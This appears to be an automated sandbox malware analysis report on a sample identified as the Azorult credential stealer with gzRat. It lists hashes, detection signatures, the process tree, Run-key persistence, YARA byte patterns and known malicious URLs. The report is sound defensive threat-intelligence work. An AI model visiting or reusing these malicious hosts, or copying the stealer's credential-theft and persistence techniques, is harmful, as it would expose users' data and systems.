Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
6CJfScEKhr

Overview

General Information

Sample Name:6CJfScEKhr (renamed file extension from none to exe)
Analysis ID:579169
MD5:8620eeaf925b0c5943c5b0a217797a32
SHA1:a5d8e44b1ffc4ab251026c5381559884901593d0
SHA256:567bc9bbf28d175408e7cf8055066cd723f71e3a23beefe06038f3eb4795c1da
Tags:32AZORultexetrojan
Infos:

Detection

Azorult gzRat
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Azorult
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected Azorult Info Stealer
Antivirus detection for URL or domain
Yara detected gzRat
Multi AV Scanner detection for domain / URL
Yara detected Costura Assembly Loader
Machine Learning detection for sample
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Found many strings related to Crypto-Wallets (likely being stolen)
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Sigma detected: CurrentVersion Autorun Keys Modification
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
PE file contains sections with non-standard names
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
Contains long sleeps (>= 3 min)
Enables debug privileges
PE file does not import any functions
Sample file is different than original file name gathered from version info
Extensive use of GetProcAddress (often used to hide API calls)
PE file contains strange resources
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Binary contains a suspicious time stamp
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Uses Microsoft's Enhanced Cryptographic Provider
Creates a process in suspended mode (likely to inject code)
Sigma detected: Autorun Keys Modification

Classification

Process Tree

  • System is w10x64
  • 6CJfScEKhr.exe (PID: 3216 cmdline: "C:\Users\user\Desktop\6CJfScEKhr.exe" MD5: 8620EEAF925B0C5943C5B0A217797A32)
    • cmd.exe (PID: 844 cmdline: "C:\Windows\System32\cmd.exe" /c timeout 20 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 3440 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • timeout.exe (PID: 2512 cmdline: timeout 20 MD5: 121A4EDAE60A7AF6F5DFA82F7BB95659)
    • 6CJfScEKhr.exe (PID: 5640 cmdline: C:\Users\user\Desktop\6CJfScEKhr.exe MD5: 8620EEAF925B0C5943C5B0A217797A32)
  • Pthmzffh.exe (PID: 4564 cmdline: "C:\Users\user\AppData\Roaming\Lrqwbyq\Pthmzffh.exe" MD5: 8620EEAF925B0C5943C5B0A217797A32)
    • cmd.exe (PID: 3720 cmdline: "C:\Windows\System32\cmd.exe" /c timeout 20 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 4072 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • timeout.exe (PID: 6964 cmdline: timeout 20 MD5: 121A4EDAE60A7AF6F5DFA82F7BB95659)
  • Pthmzffh.exe (PID: 5004 cmdline: "C:\Users\user\AppData\Roaming\Lrqwbyq\Pthmzffh.exe" MD5: 8620EEAF925B0C5943C5B0A217797A32)
    • cmd.exe (PID: 6364 cmdline: "C:\Windows\System32\cmd.exe" /c timeout 20 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 6316 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • timeout.exe (PID: 2512 cmdline: timeout 20 MD5: 121A4EDAE60A7AF6F5DFA82F7BB95659)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000E.00000002.525349365.0000000004808000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_Azorult_1Yara detected AzorultJoe Security
    0000000E.00000000.402176995.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_AzorultYara detected Azorult Info StealerJoe Security
      0000000E.00000000.402176995.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_Azorult_1Yara detected AzorultJoe Security
        0000000E.00000000.402176995.0000000000400000.00000040.00000400.00020000.00000000.sdmpAzorult_1Azorult Payloadkevoreilly
        • 0x18878:$code1: C7 07 3C 00 00 00 8D 45 80 89 47 04 C7 47 08 20 00 00 00 8D 85 80 FE FF FF 89 47 10 C7 47 14 00 01 00 00 8D 85 00 FE FF FF 89 47 1C C7 47 20 80 00 00 00 8D 85 80 FD FF FF 89 47 24 C7 47 28 80 ...
        • 0x12cac:$string1: SELECT DATETIME( ((visits.visit_time/1000000)-11644473600),"unixepoch")
        0000000E.00000000.402176995.0000000000400000.00000040.00000400.00020000.00000000.sdmpAzorultdetect Azorult in memoryJPCERT/CC Incident Response Group
        • 0x18618:$v1: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
        • 0x18c78:$v1: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
        • 0x1a360:$v2: http://ip-api.com/json
        • 0x18fd2:$v3: C6 07 1E C6 47 01 15 C6 47 02 34
        Click to see the 57 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        14.0.6CJfScEKhr.exe.400000.14.raw.unpackJoeSecurity_AzorultYara detected Azorult Info StealerJoe Security
          14.0.6CJfScEKhr.exe.400000.14.raw.unpackJoeSecurity_Azorult_1Yara detected AzorultJoe Security
            14.0.6CJfScEKhr.exe.400000.14.raw.unpackAzorult_1Azorult Payloadkevoreilly
            • 0x18878:$code1: C7 07 3C 00 00 00 8D 45 80 89 47 04 C7 47 08 20 00 00 00 8D 85 80 FE FF FF 89 47 10 C7 47 14 00 01 00 00 8D 85 00 FE FF FF 89 47 1C C7 47 20 80 00 00 00 8D 85 80 FD FF FF 89 47 24 C7 47 28 80 ...
            • 0x12cac:$string1: SELECT DATETIME( ((visits.visit_time/1000000)-11644473600),"unixepoch")
            14.0.6CJfScEKhr.exe.400000.14.raw.unpackAzorultdetect Azorult in memoryJPCERT/CC Incident Response Group
            • 0x18618:$v1: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
            • 0x18c78:$v1: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
            • 0x1a360:$v2: http://ip-api.com/json
            • 0x18fd2:$v3: C6 07 1E C6 47 01 15 C6 47 02 34
            14.0.6CJfScEKhr.exe.400000.6.raw.unpackJoeSecurity_AzorultYara detected Azorult Info StealerJoe Security
              Click to see the 93 entries

              Sigma Signatures

              There are no malicious signatures, click here to show all signatures.

              Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\Users\user\AppData\Roaming\Lrqwbyq\Pthmzffh.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\6CJfScEKhr.exe, ProcessId: 3216, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Pthmzffh
              Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton: Data: Details: "C:\Users\user\AppData\Roaming\Lrqwbyq\Pthmzffh.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\6CJfScEKhr.exe, ProcessId: 3216, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Pthmzffh
              Source: Process startedAuthor: frack113: Data: Command: C:\Users\user\Desktop\6CJfScEKhr.exe, CommandLine: C:\Users\user\Desktop\6CJfScEKhr.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\Desktop\6CJfScEKhr.exe, NewProcessName: C:\Users\user\Desktop\6CJfScEKhr.exe, OriginalFileName: C:\Users\user\Desktop\6CJfScEKhr.exe, ParentCommandLine: "C:\Users\user\Desktop\6CJfScEKhr.exe" , ParentImage: C:\Users\user\Desktop\6CJfScEKhr.exe, ParentProcessId: 3216, ProcessCommandLine: C:\Users\user\Desktop\6CJfScEKhr.exe, ProcessId: 5640

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Multi AV Scanner detection for submitted file
              Source: 6CJfScEKhr.exeVirustotal: Detection: 42%Perma Link
              Source: 6CJfScEKhr.exeReversingLabs: Detection: 41%
              Antivirus detection for URL or domain
              Source: http://etapackbg.com/css/Sngggz.pngAvira URL Cloud: Label: malware
              Source: http://etapackbg.comAvira URL Cloud: Label: malware
              Source: http://clamprite.ga/azo01/index.phpAvira URL Cloud: Label: malware
              Source: http://etapackbg.com/css/Sngggz.png;Apwjojdzaicrizygsmmd.ZpaxmptxAvira URL Cloud: Label: malware
              Yara detected gzRat
              Source: Yara matchFile source: 15.2.Pthmzffh.exe.bb30000.7.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.6CJfScEKhr.exe.3999510.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.6CJfScEKhr.exe.be90000.5.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 21.2.Pthmzffh.exe.3f39510.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 21.2.Pthmzffh.exe.c4b0000.6.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.6CJfScEKhr.exe.be90000.5.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 15.2.Pthmzffh.exe.bb30000.7.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.6CJfScEKhr.exe.3999510.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 21.2.Pthmzffh.exe.3f39510.4.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 15.2.Pthmzffh.exe.3459510.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 15.2.Pthmzffh.exe.3459510.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 21.2.Pthmzffh.exe.c4b0000.6.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000015.00000002.524573757.000000000C4B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.407850693.000000000BE90000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000015.00000002.519896768.0000000003F31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000F.00000002.519431243.0000000003451000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.406535494.0000000003991000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000F.00000002.523563780.000000000BB30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Multi AV Scanner detection for domain / URL
              Source: http://etapackbg.com/css/Sngggz.pngVirustotal: Detection: 11%Perma Link
              Source: http://etapackbg.comVirustotal: Detection: 9%Perma Link
              Source: http://clamprite.ga/azo01/index.phpVirustotal: Detection: 13%Perma Link
              Machine Learning detection for sample
              Source: 6CJfScEKhr.exeJoe Sandbox ML: detected
              Source: C:\Users\user\Desktop\6CJfScEKhr.exeCode function: 14_2_004094C4 CryptUnprotectData,LocalFree,14_2_004094C4
              Source: 6CJfScEKhr.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
              Source: 6CJfScEKhr.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
              Source: Binary string: api-ms-win-crt-locale-l1-1-0.pdb source: 6CJfScEKhr.exe, 0000000E.00000003.468531219.0000000003E44000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.495924593.0000000004818000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000002.518971560.0000000003EE8000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-runtime-l1-1-0.pdb source: 6CJfScEKhr.exe, 0000000E.00000003.496441738.0000000004844000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.478411129.0000000003E4C000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.496147713.0000000004828000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.496294114.000000000482C000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.478501176.0000000003E40000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000002.518971560.0000000003EE8000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.496387090.0000000004840000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: z:\build\build\src\obj-firefox\mozglue\build\mozglue.pdb source: 6CJfScEKhr.exe, 0000000E.00000003.483837799.0000000002A14000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.499068688.0000000003B10000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.496671801.0000000003AB0000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.483758150.0000000003E40000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.497457894.0000000003AB4000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.498048842.0000000003AB8000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.498532721.0000000003ABC000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000002.529520366.000000006FB4A000.00000002.00000001.01000000.0000000B.sdmp, 6CJfScEKhr.exe, 0000000E.00000002.519459373.0000000003FB0000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: z:\build\build\src\obj-firefox\security\nss3.pdb source: 6CJfScEKhr.exe, 0000000E.00000003.485714158.0000000004980000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.500201204.0000000003BA0000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.499194104.0000000003B60000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000002.527578110.000000006BA60000.00000002.00000001.01000000.0000000A.sdmp, 6CJfScEKhr.exe, 0000000E.00000002.519459373.0000000003FB0000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-file-l1-2-0.pdb source: 6CJfScEKhr.exe, 0000000E.00000003.491983533.0000000004784000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.492267505.000000000478C000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.492145996.0000000004788000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.492385843.0000000004790000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.491857650.0000000004780000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.434513635.0000000003E44000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000002.518971560.0000000003EE8000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: ucrtbase.pdb source: 6CJfScEKhr.exe, 0000000E.00000003.501600068.0000000003CD0000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.502068733.0000000003CE8000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.500201204.0000000003BA0000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.499194104.0000000003B60000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.502531240.0000000003D0C000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000002.519459373.0000000003FB0000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.488986283.0000000004970000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-memory-l1-1-0.pdb source: 6CJfScEKhr.exe, 0000000E.00000003.492576915.00000000047A0000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.493285789.00000000047B4000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.443952981.0000000003E44000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.492747934.00000000047A4000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.493168297.00000000047B0000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.492875018.00000000047A8000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.493075719.00000000047AC000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000002.518971560.0000000003EE8000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-debug-l1-1-0.pdb source: 6CJfScEKhr.exe, 0000000E.00000003.491983533.0000000004784000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.491857650.0000000004780000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000002.518971560.0000000003EE8000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\freebl\freebl_freebl3\freebl3.pdb source: 6CJfScEKhr.exe, 0000000E.00000003.496671801.0000000003AB0000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.497457894.0000000003AB4000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.483088942.0000000003E44000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.498048842.0000000003AB8000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.482231000.0000000003E40000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.498532721.0000000003ABC000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000002.519459373.0000000003FB0000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.483008786.0000000002A14000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-sysinfo-l1-1-0.pdb source: 6CJfScEKhr.exe, 0000000E.00000003.494709446.00000000047D4000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.495171916.00000000047E8000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.493645377.00000000047C4000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.494987521.00000000047DC000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.493370701.00000000047C0000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.462331443.0000000003E4C000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.493845210.00000000047C8000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.461364025.0000000003E48000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000002.518971560.0000000003EE8000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.494141522.00000000047CC000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.494377340.00000000047D0000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.495083457.00000000047E4000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.494825630.00000000047D8000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-filesystem-l1-1-0.pdb source: 6CJfScEKhr.exe, 0000000E.00000003.495535221.0000000004800000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.467718953.0000000003E40000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.495717285.0000000004808000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000002.518971560.0000000003EE8000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.495638921.0000000004804000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-stdio-l1-1-0.pdb source: 6CJfScEKhr.exe, 0000000E.00000003.479365495.0000000003E44000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.478501176.0000000003E40000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000002.518971560.0000000003EE8000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: protobuf-net.pdb source: 6CJfScEKhr.exe, 00000000.00000002.406971785.0000000003AB3000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 00000000.00000002.408946193.000000000BFE0000.00000004.08000000.00040000.00000000.sdmp, 6CJfScEKhr.exe, 00000000.00000002.406535494.0000000003991000.00000004.00000800.00020000.00000000.sdmp, Pthmzffh.exe, 0000000F.00000002.518824108.00000000026A0000.00000004.00000800.00020000.00000000.sdmp, Pthmzffh.exe, 0000000F.00000002.519864421.0000000003573000.00000004.00000800.00020000.00000000.sdmp, Pthmzffh.exe, 0000000F.00000002.520995677.0000000005350000.00000004.08000000.00040000.00000000.sdmp, Pthmzffh.exe, 0000000F.00000002.519431243.0000000003451000.00000004.00000800.00020000.00000000.sdmp, Pthmzffh.exe, 00000015.00000002.519896768.0000000003F31000.00000004.00000800.00020000.00000000.sdmp, Pthmzffh.exe, 00000015.00000002.519547093.0000000003182000.00000004.00000800.00020000.00000000.sdmp, Pthmzffh.exe, 00000015.00000002.520559090.0000000004053000.00000004.00000800.00020000.00000000.sdmp, Pthmzffh.exe, 00000015.00000002.525075431.000000000C620000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: api-ms-win-core-heap-l1-1-0.pdb source: 6CJfScEKhr.exe, 0000000E.00000003.492576915.00000000047A0000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.441739439.0000000003E44000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.492747934.00000000047A4000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000002.518971560.0000000003EE8000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-util-l1-1-0.pdb source: 6CJfScEKhr.exe, 0000000E.00000003.494709446.00000000047D4000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.495171916.00000000047E8000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.493645377.00000000047C4000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.494987521.00000000047DC000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.493370701.00000000047C0000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.493845210.00000000047C8000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000002.518971560.0000000003EE8000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.464187220.0000000003E40000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.494141522.00000000047CC000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.495398232.00000000047F0000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.494377340.00000000047D0000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.495083457.00000000047E4000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.494825630.00000000047D8000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.495257742.00000000047EC000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-synch-l1-1-0.pdb source: 6CJfScEKhr.exe, 0000000E.00000003.494709446.00000000047D4000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.459612640.0000000003E40000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.493645377.00000000047C4000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.494987521.00000000047DC000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.493370701.00000000047C0000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.460534507.0000000003E44000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.493845210.00000000047C8000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000002.518971560.0000000003EE8000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.494141522.00000000047CC000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.494377340.00000000047D0000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.494825630.00000000047D8000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-environment-l1-1-0.pdb source: 6CJfScEKhr.exe, 0000000E.00000003.495535221.0000000004800000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000002.518971560.0000000003EE8000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.495638921.0000000004804000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: vcruntime140.i386.pdbGCTL source: 6CJfScEKhr.exe, 0000000E.00000002.529001641.000000006F491000.00000020.00000001.01000000.0000000C.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.502845901.0000000003E28000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000002.519459373.0000000003FB0000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.491428593.000000000484C000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: z:\build\build\src\obj-firefox\mozglue\build\mozglue.pdb11 source: 6CJfScEKhr.exe, 0000000E.00000003.483837799.0000000002A14000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.499068688.0000000003B10000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.496671801.0000000003AB0000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.483758150.0000000003E40000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.497457894.0000000003AB4000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.498048842.0000000003AB8000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.498532721.0000000003ABC000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000002.529520366.000000006FB4A000.00000002.00000001.01000000.0000000B.sdmp, 6CJfScEKhr.exe, 0000000E.00000002.519459373.0000000003FB0000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-errorhandling-l1-1-0.pdb source: 6CJfScEKhr.exe, 0000000E.00000003.491983533.0000000004784000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.492145996.0000000004788000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.491857650.0000000004780000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000002.518971560.0000000003EE8000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.432567018.0000000003E40000.00000004.00000800.00020000.00000000.sdmp
